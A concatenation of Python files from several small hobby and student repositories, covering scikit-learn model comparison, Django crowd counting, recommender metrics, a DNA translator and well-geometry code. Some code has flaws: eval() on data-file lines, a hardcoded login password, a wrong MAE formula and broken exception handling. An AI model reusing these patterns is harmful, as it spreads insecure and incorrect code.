from sklearn.metrics import accuracy_score
def data_split(dataSet, yCol = -1, spliSize = 0.33): #Splitting the dataset for the model.
data = pd.read_csv(dataSet, header = 0)
data.replace('?', -9999, inplace = True) #Replacing the unknown values.
y = data.iloc[:, yCol]
x = data.iloc[:, :yCol]
xTrain, xTest, yTrain, yTest = train_test_split(x, y, test_size = spliSize)
return xTrain, xTest, yTrain, yTest
def classifier(dataSet, yCol = -1):
algoDict = {0:"Logistic Regression", 1:"Naive Bayes", 2:"Stochastic Gradient Descent", 3:"K Nearest Neighbors", 4:"Decision Tree", 5:"Random Forest", 6:"SVM"} #Dictionary of the algorithms used.
spliSize = float(input("Enter the size of the testing dataset : ")) #User input for the testing size.
xTrain, xTest, yTrain, yTest = data_split(dataSet, yCol, spliSize)
accuracyList = []
results = []
results.append(logistic_regression(xTrain, yTrain, xTest, yTest))
results.append(naive_bayes(xTrain, yTrain, xTest, yTest))
results.append(stochastic_gradient_descent(xTrain, yTrain, xTest, yTest))
results.append(k_nearest_neighbors(xTrain, yTrain, xTest, yTest))
results.append(decision_tree(xTrain, yTrain, xTest, yTest))
results.append(random_forest(xTrain, yTrain, xTest, yTest))
results.append(svm(xTrain, yTrain, xTest, yTest))
for i in range(0,7):
accuracyList.append(results[i][0])
highAccuracy = max(accuracyList) #Calculating the highest accuracy.
algorithmName = algoDict[accuracyList.index(highAccuracy)]
savedModel = results[accuracyList.index(highAccuracy)][1]
return algorithmName, highAccuracy, savedModel #Returns the algorithm name which gave the maximum accuracy,
# highest accuracy and the saved model.
'''
Main Computation.
'''
def logistic_regression(xTrain, yTrain, xTest, yTest):
lr = LogisticRegression()
lr.fit(xTrain, yTrain)
yPredict = lr.predict(xTest)
acc = accuracy_score(yTest, yPredict)
accuracy = acc*100
save_lr_model = pickle.dumps(lr)
return [accuracy, save_lr_model]
def naive_bayes(xTrain, yTrain, xTest, yTest):
nb = GaussianNB()
nb.fit(xTrain, yTrain)
yPredict = nb.predict(xTest)
acc = accuracy_score(yTest, yPredict)
accuracy = acc*100
save_lr_model = pickle.dumps(nb)
return [accuracy, save_lr_model]
def stochastic_gradient_descent(xTrain, yTrain, xTest, yTest):
sgd = SGDClassifier(loss = 'modified_huber', shuffle = True, random_state = 101)
sgd.fit(xTrain, yTrain)
yPredict = sgd.predict(xTest)
acc = accuracy_score(yTest, yPredict)
accuracy = acc*100
save_lr_model = pickle.dumps(sgd)
return [accuracy, save_lr_model]
def k_nearest_neighbors(xTrain, yTrain, xTest, yTest):
k = int(input("Enter the numbers of classes for k-neighbors classifier.:"))
knn = KNeighborsClassifier(n_neighbors = k)
knn.fit(xTrain, yTrain)
yPredict = knn.predict(xTest)
acc = accuracy_score(yTest, yPredict)
accuracy = acc*100
save_lr_model = pickle.dumps(knn)
return [accuracy, save_lr_model]
def decision_tree(xTrain, yTrain, xTest, yTest):
leaf = int(input("Enter the number of classes for deccision tree algorithm. :"))
dt = DecisionTreeClassifier(min_samples_leaf = leaf)
dt.fit(xTrain, yTrain)
yPredict = dt.predict(xTest)
acc = accuracy_score(yTest, yPredict)
accuracy = acc*100
save_dt_model = pickle.dumps(dt)
return [accuracy, save_dt_model]
def random_forest(xTrain, yTrain, xTest, yTest):
estimators = int(input("Enter the number of estimators for random forest algorithm. :"))
rfc = RandomForestClassifier(n_estimators = estimators)
rfc.fit(xTrain, yTrain)
yPredict = rfc.predict(xTest)
acc = accuracy_score(yTest, yPredict)
accuracy = acc*100
save_rfc_model = pickle.dumps(rfc)
return [accuracy, save_rfc_model]
def svm(xTrain, yTrain, xTest, yTest):
kernel_fn = input("Enter the kernal function SVM algorithm. :")
s_v_m = SVC(kernel = kernel_fn)
s_v_m.fit(xTrain, yTrain)
yPredict = s_v_m.predict(xTest)
acc = accuracy_score(yTest, yPredict)
accuracy = acc*100
save_svm_model = pickle.dumps(s_v_m)
return [accuracy, save_svm_model]
--- FILE SEPARATOR ---
import sklearn
import pandas as pd
import pickle
from sklearn.cluster import KMeans
from sklearn.cluster import AgglomerativeClustering
from sklearn.cluster import SpectralClustering
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
def data_split(dataSet, spliSize = 0.33, yCol = -1): #Splitting the dataset for the model.
data = pd.read_csv(dataSet, header = 0)
data.replace('?', -9999, inplace = True) #Replacing the unknown values.
y = data.iloc[:, yCol]
x = data.iloc[:, :yCol]
xTrain, xTest, yTrain, yTest = train_test_split(x, y, test_size = spliSize)
return xTrain, xTest, yTrain, yTest
def cluster(dataSet, yCol = -1):
spliSize = float(input("Enter the size of the testing dataset : ")) #User input for the testing size.
xTrain, xTest, yTrain, yTest = data_split(dataSet, spliSize, yCol)
algoDict = {0: "k_means Clustering", 1: "Spectral Clustering", 2: "Agglomerative Clustering"}
accuracyList = []
results = []
clusters = int(input("Enter the number of clusters : "))
results.append(k_means(xTrain, xTest, yTest, clusters))
results.append(agglomerative_cluster(xTrain, xTest, yTest, clusters))
for i in range(0,3):
accuracyList.append(results[i][0])
highAccuracy = max(accuracyList) #Calculating the highest accuracy.
algorithmName = algoDict[accuracyList.index(highAccuracy)]
savedModel = results[accuracyList.index(highAccuracy)][1]
return algorithmName, highAccuracy, savedModel #Returns the algorithm name which gave the maximum accuracy,
# highest accuracy and the saved model.
'''
Main Computation
'''
def k_means(xTrain, xTest, yTest, clusters):
km = KMeans(n_clusters = clusters)
km.fit(xTrain)
xKmean = km.fit_predict(xTest)
acc = accuracy_score(yTest, xKmean)
accuracy = acc*100
save_kmeans_model = pickle.dumps(km)
return [accuracy, save_kmeans_model]
def spectral_cluster(xTrain, xTest, yTest, clusters):
sc = SpectralClustering(n_clusters = clusters)
sc.fit(xTrain)
xSpecClu = sc.fit_predict(xTest)
acc = accuracy_score(yTest, xSpecClu)
accuracy = acc*100
save_specclu_model = pickle.dumps(sc)
return [accuracy, save_specclu_model]
def agglomerative_cluster(xTrain, xTest, yTest, clusters):
aggc = AgglomerativeClustering(n_clusters = clusters)
aggc.fit(xTrain)
xAggC = aggc.fit_predict(xTest)
acc = accuracy_score(yTest, xAggC)
accuracy = acc * 100
save_agg_model = pickle.dumps(aggc)
return [accuracy, save_agg_model]
|
[
"/algoRecommender.py",
"/supervised.py",
"/unsupervised.py"
] |
00Starlord00/Image_Density_Calculation
|
import os
from imageai.Detection import ObjectDetection
import tensorflow
import keras
def crowdCount(input_image):
'''
Paths
execution_path : Path of directory where the models are saved
inpput_path : Django media path
output_path : Django media path
'''
execution_path= 'C:\\Users\\Pranav\\Documents\\Projects\\FinalYear\\Models'
input_path= 'C:\\Users\\Pranav\\Documents\\Projects\\FinalYear\\FrontEnd\\media'
output_path= 'C:\\Users\\Pranav\\Documents\\Projects\\FinalYear\\FrontEnd\\media'
detector = ObjectDetection()
detector.setModelTypeAsRetinaNet()
detector.setModelPath(os.path.join(execution_path, "resnet50_coco_best_v2.0.1.h5"))
detector.loadModel()
output_image = '_'.join(["output", input_image])
objects_present = detector.CustomObjects(person = True)
detections = detector.detectCustomObjectsFromImage(
custom_objects = objects_present,
input_image = os.path.join(input_path, input_image),
output_image_path = os.path.join(output_path, output_image),
minimum_percentage_probability = 29)
people_count = len(detections)
return people_count, output_image
'''
input_image = 'IMG_1.jpg'
total_count = crowdCount(input_image)
print('Number of people: ', total_count)
'''
--- FILE SEPARATOR ---
import os
import requests
from .mainProcess import crowdCount
import sys
from subprocess import run, PIPE
from django.shortcuts import render
from django.http import HttpResponse
from django.core.files.storage import FileSystemStorage
def index(request):
return render(request, 'index.html')
def dataProcess(request):
input_image = request.FILES['images']
fs = FileSystemStorage()
input_image_name = fs.save(input_image.name, input_image)
input_image_url = fs.url(input_image_name)
total_count, output_image_name = crowdCount(input_image_name)
output_image_url = fs.url(output_image_name)
return render(request, 'index.html', {"count": total_count, "input_data": str(input_image_url), "output_data": str(output_image_url)})
|
[
"/mainProcess.py",
"/views.py"
] |
00arun00/PyRate
|
def readGz(f):
import gzip
for l in gzip.open(f):
yield eval(l)
def amazon_purchase_review():
'''
Loads the amazon purchase review data
'''
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split as tts
f_name=('Data/assignment1/train.json.gz')
df = pd.DataFrame(readGz(f_name))[['itemID','reviewerID','rating']]
data = df.values
x = data[:,:2]
y = data[:,2:]
x_train,x_test,y_train,y_test = tts(x,y,test_size = 0.5)
return x_train,y_train,x_test,y_test
--- FILE SEPARATOR ---
import numpy as np
class Metric(object):
'''
Abstarct class for evaluation metrics
'''
@staticmethod
def score(Y_hat,Y):
'''
retruns the score based on the eval metric
Args:
:Y_hat (numpy.ndarray): Predicted values
:Y (numpy.ndarray): Labels
Returns:
:error (float): Score
'''
raise NotImplementedError('Abstract class')
def __call__(self,Y_hat,Y):
return self.score(Y_hat,Y)
def __repr__(self):
if hasattr(self,'eval_metric'):
return f'{self.eval_metric}'
else:
raise NotImplementedError('pretty print not implemented')
class RMSE(Metric):
'''
Root Mean Square Error
'''
def __init__(self):
self.eval_metric = "RMSE"
@staticmethod
def score(Y_hat,Y):
'''
retruns the score based on root mean square
Args:
:Y_hat (numpy.ndarray): Predicted values
:Y (numpy.ndarray): Labels
Returns:
:error (float): Score based on RMSE
'''
error = np.sqrt(np.mean((Y_hat-Y)**2))
return error
class MSE(Metric):
'''
Mean Square Error
'''
def __init__(self):
self.eval_metric = "MSE"
@staticmethod
def score(Y_hat,Y):
'''
retruns the score based on root mean square
Args:
:Y_hat (numpy.ndarray): Predicted values
:Y (numpy.ndarray): Labels
Returns:
:error (float): Score based on MSE
'''
error = np.mean((Y_hat-Y)**2)
return error
class SSE(Metric):
'''
Sum of Square Error
'''
def __init__(self):
self.eval_metric = "SSE"
@staticmethod
def score(Y_hat,Y):
'''
retruns the score based on sum of squared error
Args:
:Y_hat (numpy.ndarray): Predicted values
:Y (numpy.ndarray): Labels
Returns:
:error (float): Score based on SSE
'''
error = np.sum((Y_hat-Y)**2)
return error
class MAE(Metric):
'''
Mean Absolute Error
'''
def __init__(self):
self.eval_metric = "MAE"
@staticmethod
def score(Y_hat,Y):
'''
retruns the score based on mean absolute error
Args:
:Y_hat (numpy.ndarray): Predicted values
:Y (numpy.ndarray): Labels
Returns:
:error (float): Score based on MAE
'''
error = np.mean(np.abs((Y_hat-Y)**2))
return error
#aliases
rmse = RMSE
mse = MSE
sse = SSE
mae = MAE
--- FILE SEPARATOR ---
import numpy as np
import warnings
from eval_metrics import Metric
class Model(object):
'''
Recomender System model to be used
**Note**
This is a base class and cannot be used to make predictions
'''
def __call__(self,X):
'''
redirect to predict
'''
return self.predict(X)
def __repr__(self):
'''
pretty print
'''
if hasattr(self,'model_name'):
return f'{self.model_name}'
else:
return 'Not implemented'
def _predict_single_(self,x):
'''
Predicts single
'''
return np.random.uniform(0,5)
def predict(self,X):
'''
Predict Function
Args:
:X (numpy.ndarray): User, Item pairs to predict rating on
Retruns:
:predicted_rating (numpy.ndarray): predicted ratings
'''
predicted_rating = np.array(list(map(self._predict_single_,X))).reshape(-1,1)
return predicted_rating
def set_eval_metric(self,metric):
'''
Sets evaluation metric
Args:
:metric (Metric): evaluation metric used
'''
assert isinstance(metric,Metric)
self.eval_metric = metric
def score(self,X,Y):
'''
Predicts the score based on set eval metric
Args:
:X (numpy.ndarray): Input
:Y (numpy.ndarray): Labels
Retruns:
:score (float): score based on the selected eval metric
'''
y_pred = self.predict(X)
if not hasattr(self,'eval_metric'):
raise KeyError("Please add eval_metric")
score = self.eval_metric(y_pred,Y)
return score
def fit(self,X,Y):
'''
Fits model to the data
'''
raise NotImplementedError('This is an abstract class')
class Baseline(Model):
'''
Baseline model
'''
def __init__(self):
self.model_name = 'Baseline'
self.alpha = 0
self.fit_flag = False
def __call__(self,X):
'''
redirect to predict
'''
return self.predict(X)
def _predict_single_(self,X):
if not self.fit_flag:
warnings.warn(f'Model currently not fit, predicting 0 for all')
return self.alpha
def fit(self,X,Y):
'''
Fits model to the data
'''
self.alpha = np.mean(Y)
self.fit_flag = True
--- FILE SEPARATOR ---
import data_loader
import eval_metrics
import models
|
[
"/data_loader.py",
"/eval_metrics.py",
"/models.py",
"/pyrate.py"
] |
00ba/LIST
|
'''
Created on Sep 8, 2016
'''
class Cell:
def __init__(self):
self.cell = []
def get_car(self):
result = self.cell.pop(0)
return result
def set_car(self, n):
self.cell.insert(0, n)
def get_cdr(self):
result = self.cell.pop()
return result
def set_cdr(self, n):
self.cell.append(n)
class List(Cell):
def __init__(self):
self.root = Cell()
def get_list(self):
print self.root.cell
def set_list(self, *args):
for arg in args:
if self.root.cell == []:
self.root = cons(arg)
else:
self.root = cons(arg, self.root.cell)
return self.root
def cons(a, b = None):
newcell = Cell()
newcell.set_car(a)
newcell.set_cdr(b)
return newcell
def atom(a):
if isinstance(a, int):
return True
elif isinstance(a, str):
return True
else:
False
def eq(a, b):
if a == b:
return True
else:
return False
--- FILE SEPARATOR ---
from list import *
if __name__ == '__main__':
mylist = List()
mylist.set_list(1, 2, 3)
mylist.get_list()
--- FILE SEPARATOR ---
'''
Created on Sep 8, 2016
'''
from list import *
import unittest
class Test(unittest.TestCase):
def test_list(self):
box = List()
box = box.cons(1, 2)
self.assertEquals(box.root.get_car(),1)
self.assertEquals(box.root.get_cdr(),2)
self.assertTrue(atom(1))
self.assertTrue(atom('two'))
self.assertFalse(atom([1, 2]))
self.assertTrue(eq(1, 1))
self.assertFalse(eq(1, 2))
mylist = List()
mylist.set_list(1, 2, 3)
mylist.get_list()
self.assertEquals(mylist.get_list(), [3, [2, [1, None]]])
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.test_list']
unittest.main()
|
[
"/list.py",
"/main.py",
"/test_list.py"
] |
00ba/code_inbox
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
AccessからPostgreSQLにエクスポートされたmobileテーブルには、
すでに削除されたFittingやRecommendのデータが、"データ有"のマークのまま残っている。
この修復作業を行い、PostgreSQL上のデータを正しい状態にする。
"""
import os, sys
from string import Template
from django.conf import settings
sys.path.append(os.pardir) # pardir = 親ディレクトリ
os.environ['DJANGO_SETTINGS_MODULE']="crz.settings"
# こうしておくと、LANG=ja_JP.eucJPなKtermでもエラーを起こさず出力できる
os.environ['LANG']="ja_JP.UTF-8"
from django.test import TestCase
from django.test.client import Client
from django.http import Http404
from fitting.models import Mobile
class Mobile_icon_list():
def __init__(self):
"""
インスタンスを生成した際に、fitting.modelから全レコードを取得する
"""
records = Mobile.objects.order_by('num').all()
def get_url(self, matched_key, record):
"""
レコードのデータからリンクテスト用のurlを生成する
record = {'yid': u'201112-201411', 'num': 149190, 'recomm':None, 'mkid': 7, 'car': u'\u30a4\u30f3\u30d7\u30ec\u30c3\u30b5G4\uff08H23/12\u301cH26/11\uff09', 'after': 12010, 'pulse': 2, 'disasm': 2,'subid': u'G4', 'fitting': 2, 'gid': u'SB0000400', 'jfpdf': 2}
tmp_list = Mobile_icon_list()
tmp_list.get_url('jfpdf', record)
u'/jfpdf/SB0000400%5EG4_201112-201411/'
"""
if record['subid'] is None:
url = Template('/$key/${gid}_$yid/')
return url.substitute(key= matched_key, gid = record['gid'], yid = record['yid'])
else:
url = Template('/$key/${gid}%5E${subid}_$yid/')
return url.substitute(key= matched_key, gid = record['gid'],subid= record['subid'] ,yid = record['yid'])
def trim_record(self):
"""
jfpdf,fitting,recomm,pulse,disasm 5フィールドすべてNoneならレコードごと削除
"""
print "処理前レコード数"
print self.records.count()
print "削除レコード数"
print self.records.filter(jfpdf=None).filter(fitting=None).filter(recomm=None).filter(pulse=None).filter(disasm=None).count()
self.records.filter(jfpdf=None).filter(fitting=None).filter(recomm=None).filter(pulse=None).filter(disasm=None).delete()
print "処理後レコード数"
print self.records.count()
class Mobile_link_test(TestCase):
def mobile_link_test(self, url):
"""
各フィールドから生成されたurlが存在するかチェック
存在しないurlでテスト
url = '/jspdf/TY0000000_201204-999999/'
test = Mobile_link_test('mobile_link_test')
test.mobile_link_test(url)
404
"""
# ログイン
client = Client()
# ************** user/password ***************
client.login(username="tester", password="5aGtEagk")
response = client.get(url)
return response.status_code
if __name__ == '__main__':
"""
records:Modelsの全レコード QuerySetオブジェクト
record:個別のレコード dicオブジェクト
key:レコードのフィールド名 strオブジェクト
keyがjfpdf,fitting,recomm,pulse,disasmのどれかと一致し、
かつvalueに値が存在すれば,link_testを呼び出す
404エラーが出たフィールドには、Noneを代入
その後、全レコードに対してtrim-recordを適用
"""
test = Mobile_link_test('mobile_link_test')
tmp_list = Mobile_icon_list()
for record in tmp_list.records.values():
# print record
for key in record:
# None の判定がうまくいかないのでコメントアウト
# target_keys = ['jfpdf', 'fitting', 'recomm', 'pulse','disasm']
# [tmp_list.set_None(matched_key, record)
# for matched_key in target_keys
# if key in target_keys and record[key] is not None]
try:
if key == 'jfpdf' and record['jfpdf'] is not None:
url = tmp_list.get_url('jfpdf', record)
test.mobile_link_test(url)
elif key == 'fitting' and record['fitting'] is not None:
url = tmp_list.get_url('fitting', record)
test.mobile_link_test(url)
elif key == 'recomm' and record['recomm'] is not None:
url = tmp_list.get_url('recomm', record)
test.mobile_link_test(url)
elif key == 'pulse' and record['pulse'] is not None:
url = tmp_list.get_url('pulse', record)
test.mobile_link_test(url)
elif key == 'disasm' and record['disasm'] is not None:
url = tmp_list.get_url('disasm', record)
test.mobile_link_test(url)
except 404:
if key == 'jfpdf':
self.records.filter(num=record['num']).update(jfpdf=None)
elif key == 'fitting':
self.records.filter(num=record['num']).update(fitting=None)
elif key == 'recomm':
self.records.filter(num=record['num']).update(recomm=None)
elif key == 'pulse':
self.records.filter(num=record['num']).update(pulse=None)
elif key == 'disasm':
self.records.filter(num=record['num']).update(disasm=None)
# except:
# sys.stderr.write("ERROR : Unexpected error.\n")
tmp_list.trim_record()
# finally:
# tmp_list.records.save()
import doctest
doctest.testmod()
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: utf-8
from IconList import *
import unittest
import urllib
from urllib2 import HTTPError
from string import Template
#テストデータ
r1 = {"num":3825, "gid":'TY0000050', "yid":'201204-999999', "jfpdf":2,
"fitting":'', "recomm":'', "pulse":'', "disasm":''}
r2 = {"num":3825, "gid":'TY0000050', "yid":'201204-999999', "jfpdf":'null',
"fitting":'null', "recomm":'null', "pulse":'null',
"disasm":'null'}
tmp_list = Mobile_icon_list()
url = '/jfpdf//TY0000050_201204-999999/'
key = 'jspdf'
class Test(unittest.TestCase):
# def test_set_null(self):
# self.assertEquals(set_null(r, key), )
def test_set_null(self):
self.assertEquals(tmp_list.set_null(key, url), 'foo')
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.test_list']
unittest.main()
|
[
"/IconList.py",
"/test_IconList .py"
] |
00fatal00-dev/rpg-python
|
import pygame,sys
from player import Player
screen_size = (800, 600)
screen = pygame.display.set_mode(screen_size)
pygame.display.set_caption("Game")
running = True
#Initiating player
player = Player(0, 0, 32, 32, (255, 0, 0), .075, 0, 0)
while running:
player.x += player.move_x
player.y += player.move_y
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
#Checking player movement
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_w:
player.move_y = -player.move_speed
if event.type == pygame.KEYUP:
if event.key == pygame.K_w:
player.move_y = 0
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_s:
player.move_y = player.move_speed
if event.type == pygame.KEYUP:
if event.key == pygame.K_s:
player.move_y = 0
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_a:
player.move_x -= player.move_speed
if event.type == pygame.KEYUP:
if event.key == pygame.K_a:
player.move_x = 0
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_d:
player.move_x += player.move_speed
if event.type == pygame.KEYUP:
if event.key == pygame.K_d:
player.move_x = 0
screen.fill((0, 255, 0))
#Draw player
pygame.draw.rect(screen, player.colour, (player.x, player.y, player.width, player.height), 0)
pygame.display.update()
--- FILE SEPARATOR ---
import pygame
import json
class Player():
def __init__(self, x, y, width, height, colour, move_speed, move_x, move_y):
self.x = x
self.y = y
self.width = width
self.height = height
self.colour = colour
self.move_speed = move_speed
self.move_x = move_x
self.move_y = move_y
self.stats = {
'health': 100
}
def set_stats(self, stat_to_set, new_value):
pass
def get_stats(self, stat_to_get):
return self.stats[stat_to_get]
|
[
"/main.py",
"/player.py"
] |
00mjk/DNA_transcription_translation
|
def codons_to_acids(list_of_codons):
newlist = []
for i in list_of_codons:
if i == "GUU":
newlist.append("Valine")
if i == "GUC":
newlist.append("Valine")
if i == "GUA":
newlist.append("Valine")
if i == "GUG":
newlist.append("Valine")
if i == "GCU":
newlist.append("Alanine")
if i == "GCC":
newlist.append("Alanine")
if i == "GCA":
newlist.append("Alanine")
if i == "GCG":
newlist.append("Alanine")
if i == "GAU":
newlist.append("Aspartic Acid")
if i == "GAC":
newlist.append("Aspartic Acid")
if i == "GAA":
newlist.append("Glutamic Acid")
if i == "GAG":
newlist.append("Glutamic Acid")
if i == "GGU":
newlist.append("Glycine")
if i == "GGC":
newlist.append("Glycine")
if i == "GGA":
newlist.append("Glycine")
if i == "GGG":
newlist.append("Glycine")
if i == "UUU":
newlist.append("Phenylalanine")
if i == "UUC":
newlist.append("Phenylalanine")
if i == "UUA":
newlist.append("Leucine")
if i == "UUG":
newlist.append("Leucine")
if i == "UCU":
newlist.append("Serine")
if i == "UCC":
newlist.append("Serine")
if i == "UCA":
newlist.append("Serine")
if i == "UCG":
newlist.append("Serine")
if i == "UAU":
newlist.append("Tyrosine")
if i == "UAC":
newlist.append("Tyrosine")
if i == "UAA":
newlist.append("STOP")
if i == "UAG":
newlist.append("STOP")
if i == "UGU":
newlist.append("Cysteine")
if i == "UGC":
newlist.append("Cysteine")
if i == "UGA":
newlist.append("STOP")
if i == "UGG":
newlist.append("Tryptophan")
if i == "CUU":
newlist.append("Leucine")
if i == "CUC":
newlist.append("Leucine")
if i == "CUA":
newlist.append("Leucine")
if i == "CUG":
newlist.append("Leucine")
if i == "CCU":
newlist.append("Proline")
if i == "CCC":
newlist.append("Proline")
if i == "CCA":
newlist.append("Proline")
if i == "CCG":
newlist.append("Proline")
if i == "CAU":
newlist.append("Histidine")
if i == "CAC":
newlist.append("Histidine")
if i == "CAA":
newlist.append("Glutamine")
if i == "CAG":
newlist.append("Glutamine")
if i == "CGU":
newlist.append("Arginine")
if i == "CGC":
newlist.append("Arginine")
if i == "CGA":
newlist.append("Arginine")
if i == "CGG":
newlist.append("Arginine")
if i == "AUU":
newlist.append("Isoleucine")
if i == "AUC":
newlist.append("Isoleucine")
if i == "AUA":
newlist.append("Isoleucine")
if i == "AUG":
newlist.append("Methionine")
if i == "ACU":
newlist.append("Threonine")
if i == "ACC":
newlist.append("Threonine")
if i == "ACA":
newlist.append("Threonine")
if i == "ACG":
newlist.append("Threonine")
if i == "AAU":
newlist.append("Asparagine")
if i == "AAC":
newlist.append("Asparagine")
if i == "AAA":
newlist.append("Lysine")
if i == "AAG":
newlist.append("Lysine")
if i == "AGU":
newlist.append("Serine")
if i == "AGC":
newlist.append("Serine")
if i == "AGA":
newlist.append("Arginine")
if i == "AGG":
newlist.append("Arginine")
return newlist
--- FILE SEPARATOR ---
#This program turns a strand of DNA into mRNA, which is then converted into amino acids using a codon chart
#MIT License as usual
#Ravi Shah 2020
from amino_acids import codons_to_acids
stop_index = "NaN"
def transcription(dna):
res = []
newlist = []
res[:] = dna
for i in res:
if i == "G":
newlist.append("C")
elif i == "C":
newlist.append("G")
elif i == "A":
newlist.append("U")
elif i == "T":
newlist.append("A")
mrna_strand = ''.join(newlist)
return mrna_strand
def find_start(mrna):
try:
start_index = mrna.index("AUG")
inter_rna = mrna[start_index:]
return inter_rna
except:
print("Please enter a valid DNA strand with a start codon.")
quit()
def find_stop(mrna):
for i in mrna:
if "UAA" in i:
print("UAA STOP codon found")
stop_index = mrna.index("UAA")
elif "UAG" in i:
print("UAG STOP codon found")
stop_index = mrna.index("UAG")
elif "UGA" in i:
print("UGA STOP codon found")
stop_index = mrna.index("UGA")
else:
continue
return stop_index
def break_into_codons(mrna):
n = 3
res = [mrna[i:i+n] for i in range(0, len(mrna), n)]
return res
def truncate(codons, stop_index):
codons = codons[0:stop_index+1]
return codons
def translation(final_codons):
print("The codons are:", final_codons)
list_of_amino_acids = codons_to_acids(final_codons)
print("There are", len(list_of_amino_acids), "amino acids translated from this mRNA strand.")
return list_of_amino_acids
strand = input("Enter the DNA strand to be transcribed and translated: ")
strand = strand.upper()
messenger_rna = transcription(strand)
with_start = find_start(messenger_rna)
into_codons = break_into_codons(with_start)
stop_index = find_stop(into_codons)
final_codons = truncate(into_codons, stop_index)
amino_acids_list = translation(final_codons)
print(amino_acids_list)
|
[
"/amino_acids.py",
"/converter.py"
] |
00mjk/EarthSciPy
|
# -*- coding: utf-8 -*-
# :repository: https://github.com/postpdm/EarthSciPy
from earthscipy.wells import *
__version__ = '0.0.0'
__author__ = 'YN.Coder'
__all__ = [
]
--- FILE SEPARATOR ---
from math import cos, sin, radians
def Cos_Dg( A_Dg ):
return cos( radians( A_Dg ) )
def Sin_Dg( A_Dg ):
return sin( radians( A_Dg ) )
class StaticDot3D:
"""3D coordinates for dot"""
X = 0
Y = 0
Z = 0
def __init__(self, arg_X, arg_Y, arg_Z ):
self.X = arg_X
self.Y = arg_Y
self.Z = arg_Z
class WellGeometryStep():
"""One step of clinometry data"""
# consts from incliomerty
inclination = 0 # in metres
vertical = 0 # in degrees
tangent = 0 # in degrees
# calculable length
start_length = 0
# calculable end point coordinates
end_dot = None # type StaticDot3D
def __init__(self, arg_start_dot, arg_inclination, arg_vertical = 0, arg_tangent = 0, arg_start_length = 0 ): # no default value for arg_inclination
# store inclination vector
self.inclination = arg_inclination
self.vertical = arg_vertical
self.tangent = arg_tangent
# store start length
self.start_length = arg_start_length
# calculate end dot coordinates
self.end_dot = StaticDot3D( arg_start_dot.X, arg_start_dot.Y, arg_start_dot.Z )
# first primitive variant
self.end_dot.X += arg_inclination * Cos_Dg( self.vertical ) * Cos_Dg( self.tangent )
self.end_dot.Y += arg_inclination * Sin_Dg( self.vertical ) * Cos_Dg( self.tangent )
self.end_dot.Z += arg_inclination * Sin_Dg( self.tangent )
class BaseWell():
"""Base well class"""
wellname = ''
wellhead = None # StaticDot3D
# geometry - list of WellGeometryStep
well_length = 0
wellfield = None
def __init__(self, arg_wellname = '', arg_wellhead_X = 0, arg_wellhead_Y = 0, arg_wellhead_Z = 0 ):
self.geometry = []
self.wellname = arg_wellname
self.wellhead = StaticDot3D( arg_wellhead_X, arg_wellhead_Y, arg_wellhead_Z )
def add_geometry_step(self, arg_inclination, arg_vertical = 0, arg_tangent = 0 ): # no default value for arg_inclination
# add step
self.geometry.append( WellGeometryStep( self.End_Dot(), arg_inclination, arg_vertical, arg_tangent, self.well_length ) )
# inc the well length
self.well_length+=arg_inclination
def End_Dot( self ):
prev_dot = None # StaticDot3D
# if well has a geometry - use last step. Else use the wellhead dot
if len( self.geometry ) > 0:
prev_dot = self.geometry[-1].end_dot
else:
prev_dot = self.wellhead
return prev_dot
class Well(BaseWell):
"""Well class"""
#def __init__(self):
# pass
datums = [ 'Baltic', 'NAD27', 'NAD83', 'Ordnance Datum Newlyn', 'Normalhöhennull', 'ETRS1989', 'AOD', 'TUDKA-99' ]
class WellField():
"""Well field class"""
# Well_list - list of wells
field_name = ''
topleft = StaticDot3D( 0, 0, 0 )
bottomright = StaticDot3D( 0, 0, 0 )
def __init__(self, arg_field_name):
self.Well_list = []
self.field_name = arg_field_name
def update_field_size( self, a_StaticDot3D ):
if self.topleft.X > a_StaticDot3D.X:
self.topleft.X = a_StaticDot3D.X
if self.topleft.Y > a_StaticDot3D.Y:
self.topleft.Y = a_StaticDot3D.Y
if self.topleft.Z > a_StaticDot3D.Z:
self.topleft.Z = a_StaticDot3D.Z
if self.bottomright.X < a_StaticDot3D.X:
self.bottomright.X = a_StaticDot3D.X
if self.bottomright.Y < a_StaticDot3D.Y:
self.bottomright.Y = a_StaticDot3D.Y
if self.bottomright.Z < a_StaticDot3D.Z:
self.bottomright.Z = a_StaticDot3D.Z
def add_well( self, arg_well ):
# append well to list
self.Well_list.append( arg_well )
arg_well.wellfield = self
# recalculate field size
self.update_field_size( arg_well.wellhead )
--- FILE SEPARATOR ---
from earthscipy.wells import *
from wells_example_data import Create_WellField_North, Create_WellField_South
WF_N = Create_WellField_North()
WF_S = Create_WellField_South()
print('\nprint out the list of wells')
for wf in [ WF_N, WF_S, ]:
print( "\nField", wf.field_name )
for i in wf.Well_list:
print( '\nWell', i.wellname )
print ( 'wellhead X %+5d Y %+5d Z %+5d well_length %d' % ( i.wellhead.X, i.wellhead.Y, i.wellhead.Z, i.well_length ) )
print('\nprint out the geometry data for well', i.wellname )
for s in i.geometry:
print( 'Inclination %.1f tangent %.1f vertical %.1f. Start length %.1f. End point X Y Z (%.1f, %.1f, %.1f)' % ( s.inclination, s.tangent, s.vertical, s.start_length, s.end_dot.X, s.end_dot.Y, s.end_dot.Z ) )
print ( '\nfield size top (X %d Y %d Z %d) bottom (X %d Y %d Z %d)' % ( wf.topleft.X, wf.topleft.Y, wf.topleft.Z, wf.bottomright.X, wf.bottomright.Y, wf.bottomright.Z ) )
print("\nEnd")
--- FILE SEPARATOR ---
from earthscipy.wells import *
from wells_example_data import Create_WellField_North, Create_WellField_South
WF_N = Create_WellField_North()
WF_S = Create_WellField_South()
print( '<h1>Testing</h1>' )
#print('<h2>print out the list of wells</h2>')
for wf in [ WF_N, WF_S, ]:
print( "<h2>Field", wf.field_name, "</h2>" )
print( '<table border="2">' )
print('<tr><th>Well</th><th>Well head</th><th>Well length</th><th>Geometry data</th></tr>')
for i in wf.Well_list:
print('<tr>')
print( '<td>Well', i.wellname, '</td>' )
print( '<td>' )
